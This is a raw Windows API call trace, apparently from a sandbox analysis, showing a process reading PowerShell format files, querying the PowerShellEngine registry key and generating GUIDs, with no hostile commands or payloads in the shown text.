	[0062.735] ReadFile (in: hFile=0x2fc, lpBuffer=0x273d780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae6e4, lpOverlapped=0x0 | out: lpBuffer=0x273d780*, lpNumberOfBytesRead=0xae6e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.735] GetLastError () returned 0x0
	[0062.736] ReadFile (in: hFile=0x2fc, lpBuffer=0x273d780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae6e4, lpOverlapped=0x0 | out: lpBuffer=0x273d780*, lpNumberOfBytesRead=0xae6e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.736] GetLastError () returned 0x0
	[0062.736] ReadFile (in: hFile=0x2fc, lpBuffer=0x273d780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae6e4, lpOverlapped=0x0 | out: lpBuffer=0x273d780*, lpNumberOfBytesRead=0xae6e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.736] GetLastError () returned 0x0
	[0062.736] ReadFile (in: hFile=0x2fc, lpBuffer=0x273d780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae6e4, lpOverlapped=0x0 | out: lpBuffer=0x273d780*, lpNumberOfBytesRead=0xae6e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.736] GetLastError () returned 0x0
	[0062.736] ReadFile (in: hFile=0x2fc, lpBuffer=0x273d780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae6e4, lpOverlapped=0x0 | out: lpBuffer=0x273d780*, lpNumberOfBytesRead=0xae6e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.736] GetLastError () returned 0x0
	[0062.736] ReadFile (in: hFile=0x2fc, lpBuffer=0x273d780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae6e4, lpOverlapped=0x0 | out: lpBuffer=0x273d780*, lpNumberOfBytesRead=0xae6e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.736] GetLastError () returned 0x0
	[0062.737] ReadFile (in: hFile=0x2fc, lpBuffer=0x273d780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae6e4, lpOverlapped=0x0 | out: lpBuffer=0x273d780*, lpNumberOfBytesRead=0xae6e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.737] GetLastError () returned 0x0
	[0062.739] ReadFile (in: hFile=0x2fc, lpBuffer=0x273d780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae6e4, lpOverlapped=0x0 | out: lpBuffer=0x273d780*, lpNumberOfBytesRead=0xae6e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.739] GetLastError () returned 0x0
	[0062.739] ReadFile (in: hFile=0x2fc, lpBuffer=0x273d780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae6e4, lpOverlapped=0x0 | out: lpBuffer=0x273d780*, lpNumberOfBytesRead=0xae6e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.739] GetLastError () returned 0x0
	[0062.739] ReadFile (in: hFile=0x2fc, lpBuffer=0x273d780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae6e4, lpOverlapped=0x0 | out: lpBuffer=0x273d780*, lpNumberOfBytesRead=0xae6e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.739] GetLastError () returned 0x0
	[0062.739] ReadFile (in: hFile=0x2fc, lpBuffer=0x273d780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae6e4, lpOverlapped=0x0 | out: lpBuffer=0x273d780*, lpNumberOfBytesRead=0xae6e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.740] GetLastError () returned 0x0
	[0062.740] ReadFile (in: hFile=0x2fc, lpBuffer=0x273d780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae6e4, lpOverlapped=0x0 | out: lpBuffer=0x273d780*, lpNumberOfBytesRead=0xae6e4*=0xe67, lpOverlapped=0x0) returned 1
	[0062.740] GetLastError () returned 0x0
	[0062.740] ReadFile (in: hFile=0x2fc, lpBuffer=0x273cd87, nNumberOfBytesToRead=0x199, lpNumberOfBytesRead=0xae6e4, lpOverlapped=0x0 | out: lpBuffer=0x273cd87*, lpNumberOfBytesRead=0xae6e4*=0x0, lpOverlapped=0x0) returned 1
	[0062.740] GetLastError () returned 0x0
	[0062.740] ReadFile (in: hFile=0x2fc, lpBuffer=0x273d780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae6e4, lpOverlapped=0x0 | out: lpBuffer=0x273d780*, lpNumberOfBytesRead=0xae6e4*=0x0, lpOverlapped=0x0) returned 1
	[0062.740] GetLastError () returned 0x0
	[0062.740] CloseHandle (hObject=0x2fc) returned 1
	[0062.740] GetLastError () returned 0x0
	[0062.740] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x275e010 | out: lpFileInformation=0x275e010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a182698, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a182698, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd368cf9c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1
	[0062.740] GetLastError () returned 0x0
	[0062.740] SetErrorMode (uMode=0x1) returned 0x1
	[0062.740] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xae668 | out: phkResult=0xae668*=0x2fc) returned 0x0
	[0062.741] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xae6b0, lpData=0x0, lpcbData=0xae6ac*=0x0 | out: lpType=0xae6b0*=0x1, lpData=0x0, lpcbData=0xae6ac*=0x56) returned 0x0
	[0062.741] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xae6b0, lpData=0x242ad0, lpcbData=0xae6ac*=0x56 | out: lpType=0xae6b0*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xae6ac*=0x56) returned 0x0
	[0062.741] RegCloseKey (hKey=0x2fc) returned 0x0
	[0062.745] CoCreateGuid (in: pguid=0xae6d8 | out: pguid=0xae6d8*(Data1=0x2307bd33, Data2=0x3e02, Data3=0x404d, Data4=([0]=0x84, [1]=0x92, [2]=0x19, [3]=0x82, [4]=0xd9, [5]=0x0, [6]=0x8, [7]=0xba))) returned 0x0
	[0062.745] CoCreateGuid (in: pguid=0xae6d8 | out: pguid=0xae6d8*(Data1=0xe05d2301, Data2=0x3663, Data3=0x4a11, Data4=([0]=0x8b, [1]=0x7d, [2]=0x1b, [3]=0xe8, [4]=0x8d, [5]=0x5, [6]=0xeb, [7]=0xdd))) returned 0x0
	[0062.745] CoCreateGuid (in: pguid=0xae6d8 | out: pguid=0xae6d8*(Data1=0x42dbd81f, Data2=0x5c70, Data3=0x48d4, Data4=([0]=0xb7, [1]=0x41, [2]=0x10, [3]=0x1a, [4]=0x8e, [5]=0xbe, [6]=0x4e, [7]=0xe6))) returned 0x0
	[0062.745] CoCreateGuid (in: pguid=0xae6d8 | out: pguid=0xae6d8*(Data1=0xa3b4ec0d, Data2=0xb1b4, Data3=0x4cd8, Data4=([0]=0xa3, [1]=0x18, [2]=0x1d, [3]=0x3a, [4]=0x27, [5]=0x25, [6]=0x5d, [7]=0xb8))) returned 0x0
	[0062.745] CoCreateGuid (in: pguid=0xae6d8 | out: pguid=0xae6d8*(Data1=0x67008387, Data2=0x4610, Data3=0x4ebe, Data4=([0]=0x93, [1]=0xaf, [2]=0x14, [3]=0xf1, [4]=0x24, [5]=0xc0, [6]=0x15, [7]=0x36))) returned 0x0
	[0062.746] CoCreateGuid (in: pguid=0xae6d8 | out: pguid=0xae6d8*(Data1=0x76b906d5, Data2=0xfc08, Data3=0x4ba4, Data4=([0]=0xb1, [1]=0x1f, [2]=0xc5, [3]=0x61, [4]=0xd6, [5]=0xd4, [6]=0x24, [7]=0x2f))) returned 0x0
	[0062.746] CoCreateGuid (in: pguid=0xae6d8 | out: pguid=0xae6d8*(Data1=0xe115ac03, Data2=0xff03, Data3=0x44c7, Data4=([0]=0x95, [1]=0xa5, [2]=0xc6, [3]=0x86, [4]=0xd9, [5]=0x8d, [6]=0xcb, [7]=0x52))) returned 0x0
	[0062.746] VirtualQuery (in: lpAddress=0xad430, lpBuffer=0xae430, dwLength=0x1c | out: lpBuffer=0xae430*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.746] CoCreateGuid (in: pguid=0xae6d8 | out: pguid=0xae6d8*(Data1=0xa01b9135, Data2=0x957d, Data3=0x49c4, Data4=([0]=0x84, [1]=0xed, [2]=0xbd, [3]=0x37, [4]=0xc9, [5]=0x8, [6]=0xf4, [7]=0x97))) returned 0x0
	[0062.746] CoCreateGuid (in: pguid=0xae6d8 | out: pguid=0xae6d8*(Data1=0x4029edfd, Data2=0xe7aa, Data3=0x466e, Data4=([0]=0xb5, [1]=0x3e, [2]=0x59, [3]=0xee, [4]=0x5b, [5]=0x78, [6]=0xf5, [7]=0xf3))) returned 0x0
	[0062.746] CoCreateGuid (in: pguid=0xae6d8 | out: pguid=0xae6d8*(Data1=0x5163ae2c, Data2=0x78ab, Data3=0x441c, Data4=([0]=0x8b, [1]=0x93, [2]=0x57, [3]=0x41, [4]=0x5f, [5]=0xfd, [6]=0xbe, [7]=0xca))) returned 0x0
	[0062.746] CoCreateGuid (in: pguid=0xae6d8 | out: pguid=0xae6d8*(Data1=0x4c75857d, Data2=0xd639, Data3=0x4bb0, Data4=([0]=0x82, [1]=0xcf, [2]=0x73, [3]=0xad, [4]=0x88, [5]=0xa, [6]=0x12, [7]=0x12))) returned 0x0
	[0062.746] CoCreateGuid (in: pguid=0xae6d8 | out: pguid=0xae6d8*(Data1=0x3fad2156, Data2=0x9eea, Data3=0x4f8e, Data4=([0]=0xa0, [1]=0x88, [2]=0x3a, [3]=0xa1, [4]=0x65, [5]=0x1e, [6]=0x80, [7]=0xac))) returned 0x0
	[0062.747] CoCreateGuid (in: pguid=0xae6d8 | out: pguid=0xae6d8*(Data1=0x72e557a1, Data2=0x5cb5, Data3=0x414d, Data4=([0]=0xbb, [1]=0xe8, [2]=0xf7, [3]=0xe0, [4]=0x4a, [5]=0x6a, [6]=0xfd, [7]=0x8))) returned 0x0
	[0062.747] CoCreateGuid (in: pguid=0xae6d8 | out: pguid=0xae6d8*(Data1=0x464338c3, Data2=0xe3e5, Data3=0x435c, Data4=([0]=0xa7, [1]=0xbe, [2]=0x1c, [3]=0xdd, [4]=0x98, [5]=0xe2, [6]=0xe2, [7]=0x4e))) returned 0x0
	[0062.747] CoCreateGuid (in: pguid=0xae6d8 | out: pguid=0xae6d8*(Data1=0x18886d86, Data2=0x646f, Data3=0x46d9, Data4=([0]=0xab, [1]=0x90, [2]=0x88, [3]=0x33, [4]=0x81, [5]=0x21, [6]=0xdf, [7]=0xc2))) returned 0x0
	[0062.747] CoCreateGuid (in: pguid=0xae6d8 | out: pguid=0xae6d8*(Data1=0x1d28ddc7, Data2=0xc223, Data3=0x49e0, Data4=([0]=0x89, [1]=0x7, [2]=0x8f, [3]=0x6b, [4]=0xfc, [5]=0x5c, [6]=0xe4, [7]=0x3))) returned 0x0
	[0062.747] CoCreateGuid (in: pguid=0xae6d8 | out: pguid=0xae6d8*(Data1=0x2a777ad8, Data2=0x40b0, Data3=0x4174, Data4=([0]=0x9e, [1]=0x20, [2]=0xba, [3]=0xad, [4]=0xa3, [5]=0x10, [6]=0xdb, [7]=0x4d))) returned 0x0
	[0062.747] CoCreateGuid (in: pguid=0xae6d8 | out: pguid=0xae6d8*(Data1=0x9a6a1602, Data2=0xa1e5, Data3=0x4bfc, Data4=([0]=0xb2, [1]=0xba, [2]=0x69, [3]=0xe2, [4]=0x99, [5]=0x58, [6]=0x58, [7]=0x17))) returned 0x0
	[0062.748] CoCreateGuid (in: pguid=0xae6d8 | out: pguid=0xae6d8*(Data1=0x33c430c1, Data2=0x7358, Data3=0x4f4b, Data4=([0]=0x8f, [1]=0x8d, [2]=0x21, [3]=0x3a, [4]=0xea, [5]=0xb8, [6]=0x6f, [7]=0xe2))) returned 0x0
	[0062.748] VirtualQuery (in: lpAddress=0xad410, lpBuffer=0xae410, dwLength=0x1c | out: lpBuffer=0xae410*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.748] VirtualQuery (in: lpAddress=0xad410, lpBuffer=0xae410, dwLength=0x1c | out: lpBuffer=0xae410*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.748] VirtualQuery (in: lpAddress=0xad410, lpBuffer=0xae410, dwLength=0x1c | out: lpBuffer=0xae410*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.749] CoCreateGuid (in: pguid=0xae6d8 | out: pguid=0xae6d8*(Data1=0x6232f043, Data2=0xd7b3, Data3=0x4868, Data4=([0]=0xb7, [1]=0x7d, [2]=0xa3, [3]=0x45, [4]=0xa3, [5]=0xe0, [6]=0xad, [7]=0x94))) returned 0x0
	[0062.749] CoCreateGuid (in: pguid=0xae6d8 | out: pguid=0xae6d8*(Data1=0x7d9b2335, Data2=0x5d8f, Data3=0x4cba, Data4=([0]=0x80, [1]=0x29, [2]=0x75, [3]=0x15, [4]=0xe9, [5]=0xd7, [6]=0xc6, [7]=0xea))) returned 0x0
	[0062.749] CoCreateGuid (in: pguid=0xae6d8 | out: pguid=0xae6d8*(Data1=0x80aeff9f, Data2=0xb51f, Data3=0x4dd9, Data4=([0]=0xbd, [1]=0xc, [2]=0x0, [3]=0xf8, [4]=0x3, [5]=0x47, [6]=0x29, [7]=0x6))) returned 0x0
	[0062.749] CoCreateGuid (in: pguid=0xae6d8 | out: pguid=0xae6d8*(Data1=0x3f31aae2, Data2=0xd7be, Data3=0x4d86, Data4=([0]=0xbd, [1]=0xcc, [2]=0x5b, [3]=0xf3, [4]=0x93, [5]=0xb2, [6]=0x25, [7]=0xb))) returned 0x0
	[0062.749] CoCreateGuid (in: pguid=0xae6d8 | out: pguid=0xae6d8*(Data1=0x927cec01, Data2=0x7282, Data3=0x428f, Data4=([0]=0x95, [1]=0x64, [2]=0x33, [3]=0x6d, [4]=0x29, [5]=0x67, [6]=0x87, [7]=0xe4))) returned 0x0
	[0062.750] CoCreateGuid (in: pguid=0xae6d8 | out: pguid=0xae6d8*(Data1=0x4e28a6f0, Data2=0xd2a, Data3=0x4e47, Data4=([0]=0xb2, [1]=0x9e, [2]=0x84, [3]=0x2f, [4]=0x2d, [5]=0x1a, [6]=0xc3, [7]=0xa3))) returned 0x0
	[0062.750] CoCreateGuid (in: pguid=0xae6d8 | out: pguid=0xae6d8*(Data1=0xbe6cb314, Data2=0x8f6d, Data3=0x493d, Data4=([0]=0x8c, [1]=0xd6, [2]=0xb5, [3]=0x8c, [4]=0xb5, [5]=0x6a, [6]=0x4c, [7]=0x8a))) returned 0x0
	[0062.750] CoCreateGuid (in: pguid=0xae6d8 | out: pguid=0xae6d8*(Data1=0xfe5649f5, Data2=0x83bd, Data3=0x44b1, Data4=([0]=0x90, [1]=0xf5, [2]=0x48, [3]=0x1c, [4]=0x13, [5]=0x12, [6]=0xc2, [7]=0x43))) returned 0x0
	[0062.750] CoCreateGuid (in: pguid=0xae6d8 | out: pguid=0xae6d8*(Data1=0x6ceb067a, Data2=0x2d23, Data3=0x4007, Data4=([0]=0xa1, [1]=0x2, [2]=0xd4, [3]=0xb8, [4]=0x55, [5]=0x3, [6]=0x17, [7]=0x98))) returned 0x0
	[0062.750] CoCreateGuid (in: pguid=0xae6d8 | out: pguid=0xae6d8*(Data1=0xe07b52c0, Data2=0xd58e, Data3=0x49d1, Data4=([0]=0xa3, [1]=0x8f, [2]=0x7f, [3]=0xb8, [4]=0x8c, [5]=0x0, [6]=0x50, [7]=0x89))) returned 0x0
	[0062.751] CoCreateGuid (in: pguid=0xae6d8 | out: pguid=0xae6d8*(Data1=0x6066f3b0, Data2=0xc8bb, Data3=0x4b4e, Data4=([0]=0xb6, [1]=0x7e, [2]=0xcb, [3]=0xc1, [4]=0x6b, [5]=0x6b, [6]=0x73, [7]=0xa7))) returned 0x0
	[0062.751] CoCreateGuid (in: pguid=0xae6d8 | out: pguid=0xae6d8*(Data1=0x9301aa2a, Data2=0x720c, Data3=0x4c15, Data4=([0]=0x85, [1]=0x28, [2]=0x68, [3]=0x20, [4]=0xe5, [5]=0xda, [6]=0xc8, [7]=0xb7))) returned 0x0
	[0062.751] CoCreateGuid (in: pguid=0xae6d8 | out: pguid=0xae6d8*(Data1=0x18732827, Data2=0xcecf, Data3=0x4828, Data4=([0]=0xa9, [1]=0x76, [2]=0x56, [3]=0xb4, [4]=0x37, [5]=0x59, [6]=0x50, [7]=0x93))) returned 0x0
	[0062.751] VirtualQuery (in: lpAddress=0xad430, lpBuffer=0xae430, dwLength=0x1c | out: lpBuffer=0xae430*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.751] CoCreateGuid (in: pguid=0xae6d8 | out: pguid=0xae6d8*(Data1=0xd1a13e93, Data2=0xd3e8, Data3=0x48a3, Data4=([0]=0x85, [1]=0xfe, [2]=0xc7, [3]=0x56, [4]=0x95, [5]=0x6e, [6]=0xa4, [7]=0xe2))) returned 0x0
	[0062.751] VirtualQuery (in: lpAddress=0xad430, lpBuffer=0xae430, dwLength=0x1c | out: lpBuffer=0xae430*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.753] VirtualQuery (in: lpAddress=0xad430, lpBuffer=0xae430, dwLength=0x1c | out: lpBuffer=0xae430*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.755] CoCreateGuid (in: pguid=0xae6d8 | out: pguid=0xae6d8*(Data1=0x4fa92bd2, Data2=0x1720, Data3=0x435e, Data4=([0]=0x9a, [1]=0x41, [2]=0xa7, [3]=0xa9, [4]=0xa6, [5]=0xd6, [6]=0x27, [7]=0x4a))) returned 0x0
	[0062.755] VirtualQuery (in: lpAddress=0xad430, lpBuffer=0xae430, dwLength=0x1c | out: lpBuffer=0xae430*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.755] CoCreateGuid (in: pguid=0xae6d8 | out: pguid=0xae6d8*(Data1=0x1d050e2c, Data2=0x7971, Data3=0x45b6, Data4=([0]=0x97, [1]=0x54, [2]=0xb4, [3]=0xf2, [4]=0x36, [5]=0xa, [6]=0x3c, [7]=0xf5))) returned 0x0
	[0062.755] CoCreateGuid (in: pguid=0xae6d8 | out: pguid=0xae6d8*(Data1=0xcee76c62, Data2=0x3167, Data3=0x489f, Data4=([0]=0x93, [1]=0x43, [2]=0xf8, [3]=0x1d, [4]=0xf2, [5]=0x89, [6]=0x3a, [7]=0xf0))) returned 0x0
	[0062.756] CoCreateGuid (in: pguid=0xae6d8 | out: pguid=0xae6d8*(Data1=0x7857c8cd, Data2=0xd7a0, Data3=0x4766, Data4=([0]=0xab, [1]=0xf6, [2]=0x37, [3]=0xc8, [4]=0x69, [5]=0xcb, [6]=0x79, [7]=0xa1))) returned 0x0
	[0062.756] CoCreateGuid (in: pguid=0xae6d8 | out: pguid=0xae6d8*(Data1=0xe7e46aa7, Data2=0xdb09, Data3=0x45ab, Data4=([0]=0xa3, [1]=0xb6, [2]=0x9c, [3]=0xe6, [4]=0x4e, [5]=0x70, [6]=0xc7, [7]=0xb6))) returned 0x0
	[0062.756] CoCreateGuid (in: pguid=0xae6d8 | out: pguid=0xae6d8*(Data1=0x48a1946a, Data2=0x1c3e, Data3=0x4899, Data4=([0]=0x86, [1]=0x9c, [2]=0x9f, [3]=0x30, [4]=0xbf, [5]=0x9a, [6]=0x7f, [7]=0xbb))) returned 0x0
	[0062.756] CoCreateGuid (in: pguid=0xae6d8 | out: pguid=0xae6d8*(Data1=0x2001a4c1, Data2=0x8a3a, Data3=0x4b61, Data4=([0]=0xa8, [1]=0xed, [2]=0x4c, [3]=0x75, [4]=0xed, [5]=0xad, [6]=0x42, [7]=0x22))) returned 0x0
	[0062.756] CoCreateGuid (in: pguid=0xae6d8 | out: pguid=0xae6d8*(Data1=0xd3eace29, Data2=0x7e00, Data3=0x4848, Data4=([0]=0xb4, [1]=0x19, [2]=0x6b, [3]=0xdf, [4]=0x40, [5]=0x3a, [6]=0x2, [7]=0xb1))) returned 0x0
	[0062.757] VirtualQuery (in: lpAddress=0xad410, lpBuffer=0xae410, dwLength=0x1c | out: lpBuffer=0xae410*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.757] CoCreateGuid (in: pguid=0xae6d8 | out: pguid=0xae6d8*(Data1=0x7ee7510b, Data2=0xa065, Data3=0x4239, Data4=([0]=0x8d, [1]=0xe4, [2]=0xa9, [3]=0x44, [4]=0xcc, [5]=0x8e, [6]=0xf5, [7]=0xe0))) returned 0x0
	[0062.758] CoCreateGuid (in: pguid=0xae6d8 | out: pguid=0xae6d8*(Data1=0xb0fe6b54, Data2=0xcbd4, Data3=0x4779, Data4=([0]=0x84, [1]=0xe3, [2]=0x31, [3]=0x44, [4]=0x41, [5]=0xfe, [6]=0xd9, [7]=0x79))) returned 0x0
	[0062.758] CoCreateGuid (in: pguid=0xae6d8 | out: pguid=0xae6d8*(Data1=0xd556cc07, Data2=0xdf04, Data3=0x454a, Data4=([0]=0xa9, [1]=0x53, [2]=0x1, [3]=0xea, [4]=0x3d, [5]=0x1a, [6]=0x9d, [7]=0xd))) returned 0x0
	[0062.758] CoCreateGuid (in: pguid=0xae6d8 | out: pguid=0xae6d8*(Data1=0xa53c37ad, Data2=0x908f, Data3=0x4872, Data4=([0]=0x82, [1]=0xef, [2]=0x7d, [3]=0xfb, [4]=0xce, [5]=0xd, [6]=0xe1, [7]=0x8b))) returned 0x0
	[0062.758] CoCreateGuid (in: pguid=0xae6d8 | out: pguid=0xae6d8*(Data1=0xff474da, Data2=0xd522, Data3=0x43cf, Data4=([0]=0x96, [1]=0x40, [2]=0x7e, [3]=0x43, [4]=0x99, [5]=0x5c, [6]=0x1a, [7]=0x0))) returned 0x0
	[0062.758] VirtualQuery (in: lpAddress=0xad410, lpBuffer=0xae410, dwLength=0x1c | out: lpBuffer=0xae410*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.758] CoCreateGuid (in: pguid=0xae6d8 | out: pguid=0xae6d8*(Data1=0xa69fae7f, Data2=0xe162, Data3=0x48d0, Data4=([0]=0xbc, [1]=0xb1, [2]=0x47, [3]=0x9, [4]=0x97, [5]=0x52, [6]=0xb7, [7]=0xaa))) returned 0x0
	[0062.759] CoCreateGuid (in: pguid=0xae6d8 | out: pguid=0xae6d8*(Data1=0xb6a6726c, Data2=0x9b17, Data3=0x4fb2, Data4=([0]=0xb4, [1]=0x81, [2]=0x24, [3]=0x39, [4]=0xfe, [5]=0x14, [6]=0x81, [7]=0x2f))) returned 0x0
	[0062.759] VirtualQuery (in: lpAddress=0xad438, lpBuffer=0xae438, dwLength=0x1c | out: lpBuffer=0xae438*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.759] VirtualQuery (in: lpAddress=0xad438, lpBuffer=0xae438, dwLength=0x1c | out: lpBuffer=0xae438*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.759] VirtualQuery (in: lpAddress=0xad438, lpBuffer=0xae438, dwLength=0x1c | out: lpBuffer=0xae438*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.759] VirtualQuery (in: lpAddress=0xad438, lpBuffer=0xae438, dwLength=0x1c | out: lpBuffer=0xae438*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.760] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2fc
	[0062.760] GetLastError () returned 0x0
	[0062.760] GetFileType (hFile=0x2fc) returned 0x1
	[0062.760] SetErrorMode (uMode=0x1) returned 0x1
	[0062.760] GetFileType (hFile=0x2fc) returned 0x1
	[0062.760] ReadFile (in: hFile=0x2fc, lpBuffer=0x282e158, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae6e4, lpOverlapped=0x0 | out: lpBuffer=0x282e158*, lpNumberOfBytesRead=0xae6e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.761] GetLastError () returned 0x0
	[0062.761] ReadFile (in: hFile=0x2fc, lpBuffer=0x282e158, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae6e4, lpOverlapped=0x0 | out: lpBuffer=0x282e158*, lpNumberOfBytesRead=0xae6e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.761] GetLastError () returned 0x0
	[0062.762] ReadFile (in: hFile=0x2fc, lpBuffer=0x282e158, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae6e4, lpOverlapped=0x0 | out: lpBuffer=0x282e158*, lpNumberOfBytesRead=0xae6e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.762] GetLastError () returned 0x0
	[0062.762] ReadFile (in: hFile=0x2fc, lpBuffer=0x282e158, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae6e4, lpOverlapped=0x0 | out: lpBuffer=0x282e158*, lpNumberOfBytesRead=0xae6e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.762] GetLastError () returned 0x0
	[0062.763] ReadFile (in: hFile=0x2fc, lpBuffer=0x282e158, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae6e4, lpOverlapped=0x0 | out: lpBuffer=0x282e158*, lpNumberOfBytesRead=0xae6e4*=0x8b4, lpOverlapped=0x0) returned 1
	[0062.763] GetLastError () returned 0x0
	[0062.763] ReadFile (in: hFile=0x2fc, lpBuffer=0x282d5ac, nNumberOfBytesToRead=0x34c, lpNumberOfBytesRead=0xae6e4, lpOverlapped=0x0 | out: lpBuffer=0x282d5ac*, lpNumberOfBytesRead=0xae6e4*=0x0, lpOverlapped=0x0) returned 1
	[0062.763] GetLastError () returned 0x0
	[0062.763] ReadFile (in: hFile=0x2fc, lpBuffer=0x282e158, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae6e4, lpOverlapped=0x0 | out: lpBuffer=0x282e158*, lpNumberOfBytesRead=0xae6e4*=0x0, lpOverlapped=0x0) returned 1
	[0062.763] GetLastError () returned 0x0
	[0062.763] CloseHandle (hObject=0x2fc) returned 1
	[0062.763] GetLastError () returned 0x0
	[0062.763] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x284f154 | out: lpFileInformation=0x284f154*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a1a87f7, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a1a87f7, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd36b30fc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1
	[0062.763] GetLastError () returned 0x0
	[0062.763] SetErrorMode (uMode=0x1) returned 0x1
	[0062.763] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xae668 | out: phkResult=0xae668*=0x2fc) returned 0x0
